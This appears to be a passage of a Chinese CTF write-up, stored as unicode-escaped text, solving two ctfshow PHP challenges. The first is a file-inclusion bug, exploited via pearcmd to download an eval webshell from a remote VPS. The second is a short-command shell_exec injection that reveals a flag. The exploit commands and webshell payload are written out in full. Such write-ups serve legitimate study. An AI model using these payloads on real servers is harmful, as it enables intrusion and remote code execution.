\u771f\u7684\u73a9\u4e0d\u6765\uff0c\u5bf9\u7740\u5e08\u5085\u7684wp\u7a0d\u5fae\u590d\u73b0\u4e86\u4e00\u4e0b\uff0c\u7262\u7262\u8bb0\u4f4f\uff01\uff01\uff01\uff01\uff01\u8be6\u60c5\u770b\uff1ahttps:\/\/blog.csdn.net\/qq_46091464\/article\/details\/108954166<\/a><\/p>\n
<?php\nif(isset($_GET['c'])){\n       $c=$_GET['c'];\n       if(!preg_match("\/\\:|\\\/|\\\\\\\/i",$c)){\n               include($c.".php");\n       }\n}else{\n        highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fd9\u4e2a\u9898\u76ee\u7684\u8eab\u4efd\u662fwww\u7528\u6237\uff0c<\/code>\u65e0\u6cd5\u8fdc\u7a0b\u8bbf\u95ee\u9ed8\u8ba4\u65e5\u5fd7\u6587\u4ef6<\/code>\u3002<\/p>\n
\u65b9\u6cd5\u4e00\uff1apearcmd<\/h3>\n
pear\u662f\u4e00\u4e2a\u662f\u53ef\u91cd\u7528\u7684PHP\u7ec4\u4ef6\u6846\u67b6\u548c\u7cfb\u7edf\u5206\u53d1\n\u2013 \u4e3aPHP\u7528\u6237\u63d0\u4f9b\u5f00\u6e90\u7684\u7ed3\u6784\u5316\u4ee3\u7801\u5e93\n\u2013 \u4fbf\u4e8e\u4ee3\u7801\u7684\u5206\u53d1\u548c\u5305\u7684\u7ef4\u62a4\n\u2013 \u6807\u51c6\u5316PHP\u7684\u7f16\u5199\u4ee3\u7801\n\u2013 \u63d0\u4f9bPHP\u7684\u6269\u5c55\u793e\u533a\u5e93\uff08PECL\uff09\n\u2013 \u901a\u8fc7\u7f51\u7ad9\u3001\u90ae\u4ef6\u5217\u8868\u548c\u4e0b\u8f7d\u955c\u50cf\u652f\u6301PHP\/PEAR\u793e\u533a\n\u5728pear\u4e2d\u6709\u4e00\u4e2apearcmd.php\u7684\u7c7b\uff0c\u8fd9\u91cc\u4f20\u53c2c\u503c\u4e3apearcmd\u62fc\u63a5\u540e\u9762\u7684.php\u540e\u7f00\uff0c\u7136\u540e\u8fdb\u884c\u4e0b\u4e00\u6b65\u7684\u64cd\u4f5c\u3002\u4e0b\u8f7d\u6587\u4ef6\u4ece\u6307\u5b9a\u670d\u52a1\u5668<\/code><\/pre>\n
\u5728VPS\u4e0a\u8fd0\u884c\u7b80\u6613http\u670d\u52a1\uff1a<\/p>\n
python3 -m http.server 6666\necho "<?php @eval($_POST[hack]);?>" >shell.php\n?c=pearcmd&+download+http:\/\/A.B.C.D:80\/shell.php<\/code><\/pre>\n
\u83b7\u5f97\u767e\u5206\u4e4b\u767e\u7684\u5feb\u4e50<\/h2>\n
\u963f\u5446\u5f00\u53d1\u4e86\u81ea\u5df1\u7684\u535a\u5ba2\u7cfb\u7edf\uff0c\u51c6\u5907\u5bf9\u6b3a\u8d1f\u4ed6\u7684\u5927\u4f6c\u53e3\u5410\u82ac\u82b3<\/code><\/pre>\n
<?php\nshow_source(__FILE__);\nerror_reporting(0);\nif(strlen($_GET[1])<4){\n     echo shell_exec($_GET[1]);\n}\nelse{\n     echo "hack!!!";\n}\n?>\n\/\/by Firebasky<\/code><\/pre>\n
\/?1=ls\n===>secretsecret_ctfshow_36dddddddddd.php zzz.php\n\/?1=cat secretsecret_ctfshow_36dddddddddd.php\n===>hack!!!\n\/?1=>nl\n\/?1=*\n===>ctfshow{c5baa666-5097-42a2-bca2-4df1cf1dc12f}<\/code><\/pre>\n
\u89e3\u91ca\u4e00\u4e0b\u4e0a\u9762\u7684\u539f\u7406\uff1a<\/p>\n